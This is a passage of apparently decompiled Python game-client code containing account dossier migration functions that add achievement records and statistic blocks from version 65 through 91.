        blockFormat, blockValues = getNewStaticSizeBlockValues(max15x15Layout, achievementsValues)
    else:
        blockFormat, blockValues = ('', None)
    addBlock(updateCtx, 'max15x15', blockFormat, blockValues)
    addBlock(updateCtx, 'max7x7')
    removeRecords(updateCtx, 'achievements', achievementsPacking)
    setVersion(updateCtx, 65)
    return (
        65, updateCtx['dossierCompDescr'])
def __updateFromAccountDossier65(compDescr):
    """Migrate an account dossier from version 65 to 66.

    Adds the 'sniper2' and 'mainGun' counters to 'achievements'.
    """
    layout = ['a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2',
              'a7x7', 'achievements', 'vehTypeFrags', 'a15x15Cut',
              'rareAchievements', 'total', 'a7x7Cut', 'max15x15', 'max7x7']
    ctx = {'dossierCompDescr': compDescr,
           'blockSizeFormat': 'H',
           'versionFormat': 'H',
           'blocksLayout': layout}
    getHeader(ctx)
    addRecords(ctx, 'achievements', [('sniper2', 'H'), ('mainGun', 'H')], {})
    setVersion(ctx, 66)
    return (66, ctx['dossierCompDescr'])
def __updateFromAccountDossier66(compDescr):
    """Migrate an account dossier from version 66 to 67.

    Adds the 'achievements7x7' block, initialised to eight zeroed
    little-endian unsigned shorts.
    """
    layout = ['a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2',
              'a7x7', 'achievements', 'vehTypeFrags', 'a15x15Cut',
              'rareAchievements', 'total', 'a7x7Cut', 'max15x15', 'max7x7']
    ctx = {'dossierCompDescr': compDescr,
           'blockSizeFormat': 'H',
           'versionFormat': 'H',
           'blocksLayout': layout}
    getHeader(ctx)
    addBlock(ctx, 'achievements7x7', '<HHHHHHHH', [0] * 8)
    setVersion(ctx, 67)
    return (67, ctx['dossierCompDescr'])
def __updateFromAccountDossier67(compDescr):
    """Migrate an account dossier from version 67 to 68.

    Adds 'tacticalBreakthrough' to 'achievements7x7', defaulting to 0.
    """
    layout = ['a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2',
              'a7x7', 'achievements', 'vehTypeFrags', 'a15x15Cut',
              'rareAchievements', 'total', 'a7x7Cut', 'max15x15', 'max7x7',
              'achievements7x7']
    ctx = {'dossierCompDescr': compDescr,
           'blockSizeFormat': 'H',
           'versionFormat': 'H',
           'blocksLayout': layout}
    getHeader(ctx)
    addRecords(ctx, 'achievements7x7', [('tacticalBreakthrough', 'B')],
               {'tacticalBreakthrough': 0})
    setVersion(ctx, 68)
    return (68, ctx['dossierCompDescr'])
def __updateFromAccountDossier68(compDescr):
    """Migrate an account dossier from version 68 to 69.

    Adds the 'battleCitizen' counter to 'achievements'.
    """
    layout = ['a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2',
              'a7x7', 'achievements', 'vehTypeFrags', 'a15x15Cut',
              'rareAchievements', 'total', 'a7x7Cut', 'max15x15', 'max7x7',
              'achievements7x7']
    ctx = {'dossierCompDescr': compDescr,
           'blockSizeFormat': 'H',
           'versionFormat': 'H',
           'blocksLayout': layout}
    getHeader(ctx)
    addRecords(ctx, 'achievements', [('battleCitizen', 'B')], {})
    setVersion(ctx, 69)
    return (69, ctx['dossierCompDescr'])
def __updateFromAccountDossier69(compDescr):
    """Migrate an account dossier from version 69 to 70.

    Adds armour-damage statistics to each of the per-mode stat blocks.
    """
    layout = ['a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2',
              'a7x7', 'achievements', 'vehTypeFrags', 'a15x15Cut',
              'rareAchievements', 'total', 'a7x7Cut', 'max15x15', 'max7x7',
              'achievements7x7']
    ctx = {'dossierCompDescr': compDescr,
           'blockSizeFormat': 'H',
           'versionFormat': 'H',
           'blocksLayout': layout}
    getHeader(ctx)
    newRecords = [('potentialDamageReceived', 'I'), ('damageBlockedByArmor', 'I')]
    # Same pair of records is appended to every per-mode block.
    for block in ('a15x15_2', 'company2', 'clan2', 'a7x7'):
        addRecords(ctx, block, newRecords, {})
    setVersion(ctx, 70)
    return (70, ctx['dossierCompDescr'])
def __updateFromAccountDossier70(compDescr):
    """Migrate an account dossier from version 70 to 71.

    Snapshots each mode's current 'battlesCount' into a new
    'battlesCountBefore9_0' record.
    """
    layout = ['a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2',
              'a7x7', 'achievements', 'vehTypeFrags', 'a15x15Cut',
              'rareAchievements', 'total', 'a7x7Cut', 'max15x15', 'max7x7',
              'achievements7x7']
    ctx = {'dossierCompDescr': compDescr,
           'blockSizeFormat': 'H',
           'versionFormat': 'H',
           'blocksLayout': layout}
    getHeader(ctx)
    newRecords = [('battlesCountBefore9_0', 'I')]
    # 'battlesCount' sits at offset 4 ('I') in each of these blocks; its
    # current value seeds the new snapshot record (0 if block absent).
    for block in ('a15x15', 'company', 'clan', 'a7x7'):
        packing = {'battlesCount': (4, 'I')}
        current = getStaticSizeBlockRecordValues(ctx, block, packing)
        addRecords(ctx, block, newRecords,
                   {'battlesCountBefore9_0': current.get('battlesCount', 0)})
    setVersion(ctx, 71)
    return (71, ctx['dossierCompDescr'])
def __updateFromAccountDossier71(compDescr):
    """Migrate an account dossier from version 71 to 72.

    Pure version bump — no structural change to the blob.
    """
    layout = ['a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2',
              'a7x7', 'achievements', 'vehTypeFrags', 'a15x15Cut',
              'rareAchievements', 'total', 'a7x7Cut', 'max15x15', 'max7x7',
              'achievements7x7']
    ctx = {'dossierCompDescr': compDescr,
           'blockSizeFormat': 'H',
           'versionFormat': 'H',
           'blocksLayout': layout}
    getHeader(ctx)
    setVersion(ctx, 72)
    return (72, ctx['dossierCompDescr'])
def __updateFromAccountDossier72(compDescr):
    """Migrate an account dossier from version 72 to 73.

    Introduces the four historical-battles blocks.
    """
    layout = ['a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2',
              'a7x7', 'achievements', 'vehTypeFrags', 'a15x15Cut',
              'rareAchievements', 'total', 'a7x7Cut', 'max15x15', 'max7x7',
              'achievements7x7']
    ctx = {'dossierCompDescr': compDescr,
           'blockSizeFormat': 'H',
           'versionFormat': 'H',
           'blocksLayout': layout}
    getHeader(ctx)
    for block in ('historical', 'maxHistorical', 'historicalAchievements',
                  'historicalCut'):
        addBlock(ctx, block)
    setVersion(ctx, 73)
    return (73, ctx['dossierCompDescr'])
def __updateFromAccountDossier73(compDescr):
    """Migrate an account dossier from version 73 to 74.

    Adds seven new 7x7 achievement counters, all defaulting to 0.
    """
    layout = ['a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2',
              'a7x7', 'achievements', 'vehTypeFrags', 'a15x15Cut',
              'rareAchievements', 'total', 'a7x7Cut', 'max15x15', 'max7x7',
              'achievements7x7', 'historical', 'maxHistorical',
              'historicalAchievements', 'historicalCut']
    ctx = {'dossierCompDescr': compDescr,
           'blockSizeFormat': 'H',
           'versionFormat': 'H',
           'blocksLayout': layout}
    getHeader(ctx)
    records = [('godOfWar', 'H'),
               ('fightingReconnaissance', 'H'),
               ('fightingReconnaissanceMedal', 'H'),
               ('willToWinSpirit', 'H'),
               ('crucialShot', 'H'),
               ('crucialShotMedal', 'H'),
               ('forTacticalOperations', 'B')]
    # Every new record starts at zero.
    defaults = dict((name, 0) for name, _ in records)
    addRecords(ctx, 'achievements7x7', records, defaults)
    setVersion(ctx, 74)
    return (74, ctx['dossierCompDescr'])
def __updateFromAccountDossier74(compDescr):
    """Migrate an account dossier from version 74 to 75.

    Adds five new medal counters to 'achievements'.
    """
    layout = ['a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2',
              'a7x7', 'achievements', 'vehTypeFrags', 'a15x15Cut',
              'rareAchievements', 'total', 'a7x7Cut', 'max15x15', 'max7x7',
              'achievements7x7', 'historical', 'maxHistorical',
              'historicalAchievements', 'historicalCut']
    ctx = {'dossierCompDescr': compDescr,
           'blockSizeFormat': 'H',
           'versionFormat': 'H',
           'blocksLayout': layout}
    getHeader(ctx)
    records = [(name, 'H') for name in ('medalMonolith', 'medalAntiSpgFire',
                                        'medalGore', 'medalCoolBlood',
                                        'medalStark')]
    addRecords(ctx, 'achievements', records, {})
    setVersion(ctx, 75)
    return (75, ctx['dossierCompDescr'])
def __updateFromAccountDossier75(compDescr):
    """Migrate an account dossier from version 75 to 76.

    Introduces the 'uniqueAchievements' block.
    """
    layout = ['a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2',
              'a7x7', 'achievements', 'vehTypeFrags', 'a15x15Cut',
              'rareAchievements', 'total', 'a7x7Cut', 'max15x15', 'max7x7',
              'achievements7x7', 'historical', 'maxHistorical',
              'historicalAchievements', 'historicalCut']
    ctx = {'dossierCompDescr': compDescr,
           'blockSizeFormat': 'H',
           'versionFormat': 'H',
           'blocksLayout': layout}
    getHeader(ctx)
    addBlock(ctx, 'uniqueAchievements')
    setVersion(ctx, 76)
    return (76, ctx['dossierCompDescr'])
def __updateFromAccountDossier76(compDescr):
    """Migrate an account dossier from version 76 to 77.

    Introduces the first five fortification blocks.
    """
    layout = ['a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2',
              'a7x7', 'achievements', 'vehTypeFrags', 'a15x15Cut',
              'rareAchievements', 'total', 'a7x7Cut', 'max15x15', 'max7x7',
              'achievements7x7', 'historical', 'maxHistorical',
              'historicalAchievements', 'historicalCut', 'uniqueAchievements']
    ctx = {'dossierCompDescr': compDescr,
           'blockSizeFormat': 'H',
           'versionFormat': 'H',
           'blocksLayout': layout}
    getHeader(ctx)
    for block in ('fortBattles', 'maxFortBattles', 'fortBattlesCut',
                  'fortSorties', 'maxFortSorties'):
        addBlock(ctx, block)
    setVersion(ctx, 77)
    return (77, ctx['dossierCompDescr'])
def __updateFromAccountDossier77(compDescr):
    """Migrate an account dossier from version 77 to 78.

    Introduces the remaining fortification blocks (in-clan stats,
    misc and fort achievements).
    """
    layout = ['a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2',
              'a7x7', 'achievements', 'vehTypeFrags', 'a15x15Cut',
              'rareAchievements', 'total', 'a7x7Cut', 'max15x15', 'max7x7',
              'achievements7x7', 'historical', 'maxHistorical',
              'historicalAchievements', 'historicalCut', 'uniqueAchievements',
              'fortBattles', 'maxFortBattles', 'fortBattlesCut',
              'fortSorties', 'maxFortSorties']
    ctx = {'dossierCompDescr': compDescr,
           'blockSizeFormat': 'H',
           'versionFormat': 'H',
           'blocksLayout': layout}
    getHeader(ctx)
    for block in ('fortSortiesCut', 'fortBattlesInClan', 'maxFortBattlesInClan',
                  'fortSortiesInClan', 'maxFortSortiesInClan', 'fortMisc',
                  'fortMiscInClan', 'fortAchievements'):
        addBlock(ctx, block)
    setVersion(ctx, 78)
    return (78, ctx['dossierCompDescr'])
def __updateFromAccountDossier78(compDescr):
    """Migrate an account dossier from version 78 to 79.

    Adds eleven new 7x7 achievement counters, all defaulting to 0.
    """
    layout = ['a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2',
              'a7x7', 'achievements', 'vehTypeFrags', 'a15x15Cut',
              'rareAchievements', 'total', 'a7x7Cut', 'max15x15', 'max7x7',
              'achievements7x7', 'historical', 'maxHistorical',
              'historicalAchievements', 'historicalCut', 'uniqueAchievements',
              'fortBattles', 'maxFortBattles', 'fortBattlesCut',
              'fortSorties', 'maxFortSorties', 'fortSortiesCut',
              'fortBattlesInClan', 'maxFortBattlesInClan',
              'fortSortiesInClan', 'maxFortSortiesInClan',
              'fortMisc', 'fortMiscInClan', 'fortAchievements']
    ctx = {'dossierCompDescr': compDescr,
           'blockSizeFormat': 'H',
           'versionFormat': 'H',
           'blocksLayout': layout}
    getHeader(ctx)
    records = [(name, 'H') for name in ('promisingFighter',
                                        'promisingFighterMedal',
                                        'heavyFire', 'heavyFireMedal',
                                        'ranger', 'rangerMedal',
                                        'fireAndSteel', 'fireAndSteelMedal',
                                        'pyromaniac', 'pyromaniacMedal',
                                        'noMansLand')]
    # Every new counter starts at zero.
    defaults = dict((name, 0) for name, _ in records)
    addRecords(ctx, 'achievements7x7', records, defaults)
    setVersion(ctx, 79)
    return (79, ctx['dossierCompDescr'])
def __updateFromAccountDossier79(compDescr):
    """Migrate an account dossier from version 79 to 80.

    Adds the WFC2014 event records to 'achievements'.
    """
    layout = ['a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2',
              'a7x7', 'achievements', 'vehTypeFrags', 'a15x15Cut',
              'rareAchievements', 'total', 'a7x7Cut', 'max15x15', 'max7x7',
              'achievements7x7', 'historical', 'maxHistorical',
              'historicalAchievements', 'historicalCut', 'uniqueAchievements',
              'fortBattles', 'maxFortBattles', 'fortBattlesCut',
              'fortSorties', 'maxFortSorties', 'fortSortiesCut',
              'fortBattlesInClan', 'maxFortBattlesInClan',
              'fortSortiesInClan', 'maxFortSortiesInClan',
              'fortMisc', 'fortMiscInClan', 'fortAchievements']
    ctx = {'dossierCompDescr': compDescr,
           'blockSizeFormat': 'H',
           'versionFormat': 'H',
           'blocksLayout': layout}
    getHeader(ctx)
    records = [(name, 'B') for name in ('WFC2014', 'WFC2014WinSeries',
                                        'maxWFC2014WinSeries')]
    addRecords(ctx, 'achievements', records, {})
    setVersion(ctx, 80)
    return (80, ctx['dossierCompDescr'])
def _count7x7awards(ctx):
    """Total up the player's 7x7 awards from the 'achievements7x7' block.

    Used by the v80->v81 updater to seed the new 'awardCount' record.

    NOTE(review): decompiled source with indentation lost; the placement
    of the two ``del`` statements relative to their ``if`` guards below
    was reconstructed and should be confirmed against the original
    bytecode.
    """
    # Record name -> (byte offset, struct format) within 'achievements7x7'.
    packing = {'crucialShotMedal': (27, 'H'),
               'noMansLand': (50, 'H'),
               'fightingReconnaissanceMedal': (21, 'H'), 'godOfWar': (17, 'H'),
               'armoredFist': (14, 'H'), 'fireAndSteelMedal': (44, 'H'), 'forTacticalOperations': (29, 'B'),
               'kingOfTheHill': (8, 'H'), 'wolfAmongSheepMedal': (2, 'H'), 'willToWinSpirit': (23, 'H'),
               'heavyFireMedal': (36, 'H'), 'maxTacticalBreakthroughSeries': (12, 'H'), 'promisingFighterMedal': (32, 'H'),
               'geniusForWarMedal': (6, 'H'), 'rangerMedal': (40, 'H'), 'pyromaniacMedal': (48, 'H')
               }
    awardNum = 0
    values = getStaticSizeBlockRecordValues(ctx, 'achievements7x7', packing)
    # A breakthrough win series of 3+ counts as one award, not per value.
    if values and values['maxTacticalBreakthroughSeries'] >= 3:
        awardNum += 1
        del values['maxTacticalBreakthroughSeries']
    # 'forTacticalOperations' counts down from 5; the awards already
    # earned are the difference.
    if values and values['forTacticalOperations'] > 0:
        awardNum += 5 - values['forTacticalOperations']
        del values['forTacticalOperations']
    # Every remaining counter contributes its raw value.
    for val in values.itervalues():
        awardNum += val
    return awardNum
def __updateFromAccountDossier80(compDescr):
    """Migrate an account dossier from version 80 to 81.

    Adds ten new 7x7 counters plus 'awardCount' (seeded from the
    existing award totals via _count7x7awards) and 'battleTested'.
    """
    layout = ['a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2',
              'a7x7', 'achievements', 'vehTypeFrags', 'a15x15Cut',
              'rareAchievements', 'total', 'a7x7Cut', 'max15x15', 'max7x7',
              'achievements7x7', 'historical', 'maxHistorical',
              'historicalAchievements', 'historicalCut', 'uniqueAchievements',
              'fortBattles', 'maxFortBattles', 'fortBattlesCut',
              'fortSorties', 'maxFortSorties', 'fortSortiesCut',
              'fortBattlesInClan', 'maxFortBattlesInClan',
              'fortSortiesInClan', 'maxFortSortiesInClan',
              'fortMisc', 'fortMiscInClan', 'fortAchievements']
    ctx = {'dossierCompDescr': compDescr,
           'blockSizeFormat': 'H',
           'versionFormat': 'H',
           'blocksLayout': layout}
    getHeader(ctx)
    # Must be computed before the new records are appended.
    awardTotal = _count7x7awards(ctx)
    records = [('guerrilla', 'H'),
               ('guerrillaMedal', 'H'),
               ('infiltrator', 'H'),
               ('infiltratorMedal', 'H'),
               ('sentinel', 'H'),
               ('sentinelMedal', 'H'),
               ('prematureDetonation', 'H'),
               ('prematureDetonationMedal', 'H'),
               ('bruteForce', 'H'),
               ('bruteForceMedal', 'H'),
               ('awardCount', 'I'),
               ('battleTested', 'B')]
    defaults = dict((name, 0) for name, _ in records)
    defaults['awardCount'] = awardTotal
    addRecords(ctx, 'achievements7x7', records, defaults)
    setVersion(ctx, 81)
    return (81, ctx['dossierCompDescr'])
def __updateFromAccountDossier81(compDescr):
    """Migrate an account dossier from version 81 to 82.

    Collapses eight one-shot achievement flags into a new binary-set
    block 'singleAchievements' and removes the originals.
    """
    blocks = ['a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2',
              'a7x7', 'achievements', 'vehTypeFrags', 'a15x15Cut',
              'rareAchievements', 'total', 'a7x7Cut', 'max15x15', 'max7x7',
              'achievements7x7', 'historical', 'maxHistorical',
              'historicalAchievements', 'historicalCut', 'uniqueAchievements',
              'fortBattles', 'maxFortBattles', 'fortBattlesCut',
              'fortSorties', 'maxFortSorties', 'fortSortiesCut',
              'fortBattlesInClan', 'maxFortBattlesInClan',
              'fortSortiesInClan', 'maxFortSortiesInClan',
              'fortMisc', 'fortMiscInClan', 'fortAchievements']
    ctx = {'dossierCompDescr': compDescr,
           'blockSizeFormat': 'H',
           'versionFormat': 'H',
           'blocksLayout': blocks}
    getHeader(ctx)
    # Bit order of the new binary-set block.
    bitLayout = ['titleSniper',
                 'invincible',
                 'diehard',
                 'handOfDeath',
                 'armorPiercer',
                 'battleCitizen',
                 'WFC2014',
                 'tacticalBreakthrough']
    # Source records: name -> (byte offset, struct format).
    achPacking = {'titleSniper': (88, 'B'),
                  'invincible': (89, 'B'),
                  'diehard': (90, 'B'),
                  'handOfDeath': (93, 'B'),
                  'armorPiercer': (94, 'B'),
                  'battleCitizen': (131, 'B'),
                  'WFC2014': (142, 'B')}
    a7x7Packing = {'tacticalBreakthrough': (16, 'B')}
    flagValues = {}
    flagValues.update(getStaticSizeBlockRecordValues(ctx, 'achievements', achPacking))
    flagValues.update(getStaticSizeBlockRecordValues(ctx, 'achievements7x7', a7x7Packing))
    fmt, packed = getNewBinarySetBlockValues(bitLayout, flagValues)
    addBlock(ctx, 'singleAchievements', fmt, packed)
    removeRecords(ctx, 'achievements', achPacking)
    removeRecords(ctx, 'achievements7x7', a7x7Packing)
    setVersion(ctx, 82)
    return (82, ctx['dossierCompDescr'])
def __updateFromAccountDossier82(compDescr):
    """Migrate an account dossier from version 82 to 83.

    Introduces the 'clanAchievements' block with a zeroed
    'medalRotmistrov' record.
    """
    layout = ['a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2',
              'a7x7', 'achievements', 'vehTypeFrags', 'a15x15Cut',
              'rareAchievements', 'total', 'a7x7Cut', 'max15x15', 'max7x7',
              'achievements7x7', 'historical', 'maxHistorical',
              'historicalAchievements', 'historicalCut', 'uniqueAchievements',
              'fortBattles', 'maxFortBattles', 'fortBattlesCut',
              'fortSorties', 'maxFortSorties', 'fortSortiesCut',
              'fortBattlesInClan', 'maxFortBattlesInClan',
              'fortSortiesInClan', 'maxFortSortiesInClan',
              'fortMisc', 'fortMiscInClan', 'fortAchievements',
              'singleAchievements']
    ctx = {'dossierCompDescr': compDescr,
           'blockSizeFormat': 'H',
           'versionFormat': 'H',
           'blocksLayout': layout}
    getHeader(ctx)
    fmt, vals = getNewStaticSizeBlockValues([('medalRotmistrov', 'B')],
                                            {'medalRotmistrov': 0})
    addBlock(ctx, 'clanAchievements', fmt, vals)
    setVersion(ctx, 83)
    return (83, ctx['dossierCompDescr'])
def __updateFromAccountDossier83(compDescr):
    """Migrate an account dossier from version 83 to 84.

    Backfills 'battlesCountBefore9_0' in the 'a15x15', 'clan' and
    'company' blocks from the older pre-8.8/pre-8.9 counters whenever
    the 9.0 counter was never populated.

    NOTE(review): decompiled source with indentation lost; the
    setStaticSizeBlockRecordValues write-backs were placed inside their
    if-guards (write only when a value was migrated) — confirm against
    the original bytecode.
    """
    blocksLayout = [
        'a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2',
        'a7x7', 'achievements', 'vehTypeFrags', 'a15x15Cut',
        'rareAchievements', 'total', 'a7x7Cut', 'max15x15', 'max7x7',
        'achievements7x7', 'historical', 'maxHistorical',
        'historicalAchievements', 'historicalCut', 'uniqueAchievements',
        'fortBattles', 'maxFortBattles', 'fortBattlesCut',
        'fortSorties', 'maxFortSorties', 'fortSortiesCut',
        'fortBattlesInClan', 'maxFortBattlesInClan',
        'fortSortiesInClan', 'maxFortSortiesInClan',
        'fortMisc', 'fortMiscInClan', 'fortAchievements',
        'singleAchievements', 'clanAchievements']
    updateCtx = {'dossierCompDescr': compDescr,
                 'blockSizeFormat': 'H',
                 'versionFormat': 'H',
                 'blocksLayout': blocksLayout
                 }
    getHeader(updateCtx)
    # Record name -> (byte offset, struct format) inside each block.
    a15x15packing = {'battlesCountBefore9_0': (68, 'I'), 'battlesCountBefore8_8': (56, 'I')}
    values = getStaticSizeBlockRecordValues(updateCtx, 'a15x15', a15x15packing)
    if values and values['battlesCountBefore8_8'] > 0 and values['battlesCountBefore9_0'] == 0:
        values['battlesCountBefore9_0'] = values['battlesCountBefore8_8']
        setStaticSizeBlockRecordValues(updateCtx, 'a15x15', a15x15packing, values)
    clanPacking = {'battlesCountBefore9_0': (60, 'I'), 'battlesCountBefore8_9': (56, 'I')}
    values = getStaticSizeBlockRecordValues(updateCtx, 'clan', clanPacking)
    if values and values['battlesCountBefore8_9'] > 0 and values['battlesCountBefore9_0'] == 0:
        values['battlesCountBefore9_0'] = values['battlesCountBefore8_9']
        setStaticSizeBlockRecordValues(updateCtx, 'clan', clanPacking, values)
    companyPacking = {'battlesCountBefore9_0': (60, 'I'), 'battlesCountBefore8_9': (56, 'I')}
    values = getStaticSizeBlockRecordValues(updateCtx, 'company', companyPacking)
    if values and values['battlesCountBefore8_9'] > 0 and values['battlesCountBefore9_0'] == 0:
        values['battlesCountBefore9_0'] = values['battlesCountBefore8_9']
        setStaticSizeBlockRecordValues(updateCtx, 'company', companyPacking, values)
    setVersion(updateCtx, 84)
    return (
        84, updateCtx['dossierCompDescr'])
def __updateFromAccountDossier84(compDescr):
    """Migrate an account dossier from version 84 to 85.

    Adds twelve new counters to 'achievements'.
    """
    layout = ['a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2',
              'a7x7', 'achievements', 'vehTypeFrags', 'a15x15Cut',
              'rareAchievements', 'total', 'a7x7Cut', 'max15x15', 'max7x7',
              'achievements7x7', 'historical', 'maxHistorical',
              'historicalAchievements', 'historicalCut', 'uniqueAchievements',
              'fortBattles', 'maxFortBattles', 'fortBattlesCut',
              'fortSorties', 'maxFortSorties', 'fortSortiesCut',
              'fortBattlesInClan', 'maxFortBattlesInClan',
              'fortSortiesInClan', 'maxFortSortiesInClan',
              'fortMisc', 'fortMiscInClan', 'fortAchievements',
              'singleAchievements', 'clanAchievements']
    ctx = {'dossierCompDescr': compDescr,
           'blockSizeFormat': 'H',
           'versionFormat': 'H',
           'blocksLayout': layout}
    getHeader(ctx)
    # All 'H' except 'maxAimerSeries', which is a single byte.
    records = [('impenetrable', 'H'),
               ('reliableComradeSeries', 'H'),
               ('reliableComrade', 'H'),
               ('maxAimerSeries', 'B'),
               ('shootToKill', 'H'),
               ('fighter', 'H'),
               ('duelist', 'H'),
               ('demolition', 'H'),
               ('arsonist', 'H'),
               ('bonecrusher', 'H'),
               ('charmed', 'H'),
               ('even', 'H')]
    addRecords(ctx, 'achievements', records, {})
    setVersion(ctx, 85)
    return (85, ctx['dossierCompDescr'])
def __updateFromAccountDossier85(compDescr):
    """Migrate an account dossier from version 85 to 86.

    Adds win/base-capture counters to 'fortAchievements'.
    """
    layout = ['a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2',
              'a7x7', 'achievements', 'vehTypeFrags', 'a15x15Cut',
              'rareAchievements', 'total', 'a7x7Cut', 'max15x15', 'max7x7',
              'achievements7x7', 'historical', 'maxHistorical',
              'historicalAchievements', 'historicalCut', 'uniqueAchievements',
              'fortBattles', 'maxFortBattles', 'fortBattlesCut',
              'fortSorties', 'maxFortSorties', 'fortSortiesCut',
              'fortBattlesInClan', 'maxFortBattlesInClan',
              'fortSortiesInClan', 'maxFortSortiesInClan',
              'fortMisc', 'fortMiscInClan', 'fortAchievements',
              'singleAchievements', 'clanAchievements']
    ctx = {'dossierCompDescr': compDescr,
           'blockSizeFormat': 'H',
           'versionFormat': 'H',
           'blocksLayout': layout}
    getHeader(ctx)
    records = [(name, 'H') for name in ('wins', 'capturedBasesInAttack',
                                        'capturedBasesInDefence')]
    addRecords(ctx, 'fortAchievements', records, {})
    setVersion(ctx, 86)
    return (86, ctx['dossierCompDescr'])
def __updateFromAccountDossier86(compDescr):
    """Migrate an account dossier from version 86 to 87.

    Adds the death-track win-series counters to 'achievements'.
    """
    layout = ['a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2',
              'a7x7', 'achievements', 'vehTypeFrags', 'a15x15Cut',
              'rareAchievements', 'total', 'a7x7Cut', 'max15x15', 'max7x7',
              'achievements7x7', 'historical', 'maxHistorical',
              'historicalAchievements', 'historicalCut', 'uniqueAchievements',
              'fortBattles', 'maxFortBattles', 'fortBattlesCut',
              'fortSorties', 'maxFortSorties', 'fortSortiesCut',
              'fortBattlesInClan', 'maxFortBattlesInClan',
              'fortSortiesInClan', 'maxFortSortiesInClan',
              'fortMisc', 'fortMiscInClan', 'fortAchievements',
              'singleAchievements', 'clanAchievements']
    ctx = {'dossierCompDescr': compDescr,
           'blockSizeFormat': 'H',
           'versionFormat': 'H',
           'blocksLayout': layout}
    getHeader(ctx)
    records = [('deathTrackWinSeries', 'B'), ('maxDeathTrackWinSeries', 'B')]
    addRecords(ctx, 'achievements', records, {})
    setVersion(ctx, 87)
    return (87, ctx['dossierCompDescr'])
def __updateFromAccountDossier87(compDescr):
    """Migrate an account dossier from version 87 to 88.

    Adds the per-class 'readyForBattle' flags and 'tankwomenProgress'
    to 'achievements'.
    """
    layout = ['a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2',
              'a7x7', 'achievements', 'vehTypeFrags', 'a15x15Cut',
              'rareAchievements', 'total', 'a7x7Cut', 'max15x15', 'max7x7',
              'achievements7x7', 'historical', 'maxHistorical',
              'historicalAchievements', 'historicalCut', 'uniqueAchievements',
              'fortBattles', 'maxFortBattles', 'fortBattlesCut',
              'fortSorties', 'maxFortSorties', 'fortSortiesCut',
              'fortBattlesInClan', 'maxFortBattlesInClan',
              'fortSortiesInClan', 'maxFortSortiesInClan',
              'fortMisc', 'fortMiscInClan', 'fortAchievements',
              'singleAchievements', 'clanAchievements']
    ctx = {'dossierCompDescr': compDescr,
           'blockSizeFormat': 'H',
           'versionFormat': 'H',
           'blocksLayout': layout}
    getHeader(ctx)
    records = [(name, 'B') for name in ('readyForBattleLT',
                                        'readyForBattleMT',
                                        'readyForBattleHT',
                                        'readyForBattleSPG',
                                        'readyForBattleATSPG',
                                        'readyForBattleALL',
                                        'tankwomenProgress')]
    addRecords(ctx, 'achievements', records, {})
    setVersion(ctx, 88)
    return (88, ctx['dossierCompDescr'])
def __updateFromAccountDossier88(compDescr):
    """Migrate an account dossier from version 88 to 89.

    Introduces the 'rated7x7' and 'maxRated7x7' blocks.
    """
    layout = ['a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2',
              'a7x7', 'achievements', 'vehTypeFrags', 'a15x15Cut',
              'rareAchievements', 'total', 'a7x7Cut', 'max15x15', 'max7x7',
              'achievements7x7', 'historical', 'maxHistorical',
              'historicalAchievements', 'historicalCut', 'uniqueAchievements',
              'fortBattles', 'maxFortBattles', 'fortBattlesCut',
              'fortSorties', 'maxFortSorties', 'fortSortiesCut',
              'fortBattlesInClan', 'maxFortBattlesInClan',
              'fortSortiesInClan', 'maxFortSortiesInClan',
              'fortMisc', 'fortMiscInClan', 'fortAchievements',
              'singleAchievements', 'clanAchievements']
    ctx = {'dossierCompDescr': compDescr,
           'blockSizeFormat': 'H',
           'versionFormat': 'H',
           'blocksLayout': layout}
    getHeader(ctx)
    for block in ('rated7x7', 'maxRated7x7'):
        addBlock(ctx, block)
    setVersion(ctx, 89)
    return (89, ctx['dossierCompDescr'])
def __updateFromAccountDossier89(compDescr):
    """Migrate an account dossier from version 89 to 90.

    Introduces the 'achievementsRated7x7' block.
    """
    layout = ['a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2',
              'a7x7', 'achievements', 'vehTypeFrags', 'a15x15Cut',
              'rareAchievements', 'total', 'a7x7Cut', 'max15x15', 'max7x7',
              'achievements7x7', 'historical', 'maxHistorical',
              'historicalAchievements', 'historicalCut', 'uniqueAchievements',
              'fortBattles', 'maxFortBattles', 'fortBattlesCut',
              'fortSorties', 'maxFortSorties', 'fortSortiesCut',
              'fortBattlesInClan', 'maxFortBattlesInClan',
              'fortSortiesInClan', 'maxFortSortiesInClan',
              'fortMisc', 'fortMiscInClan', 'fortAchievements',
              'singleAchievements', 'clanAchievements',
              'rated7x7', 'maxRated7x7']
    ctx = {'dossierCompDescr': compDescr,
           'blockSizeFormat': 'H',
           'versionFormat': 'H',
           'blocksLayout': layout}
    getHeader(ctx)
    addBlock(ctx, 'achievementsRated7x7')
    setVersion(ctx, 90)
    return (90, ctx['dossierCompDescr'])
def __updateFromAccountDossier90(compDescr):
    """Upgrade an account dossier from version 90 to 91 by appending the
    'rated7x7Cut' block.  Returns (newVersion, newCompDescr).
    """
    # Ordered block names of a v90 account dossier.
    layout = ['a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2',
              'a7x7', 'achievements', 'vehTypeFrags', 'a15x15Cut',
              'rareAchievements', 'total', 'a7x7Cut', 'max15x15', 'max7x7',
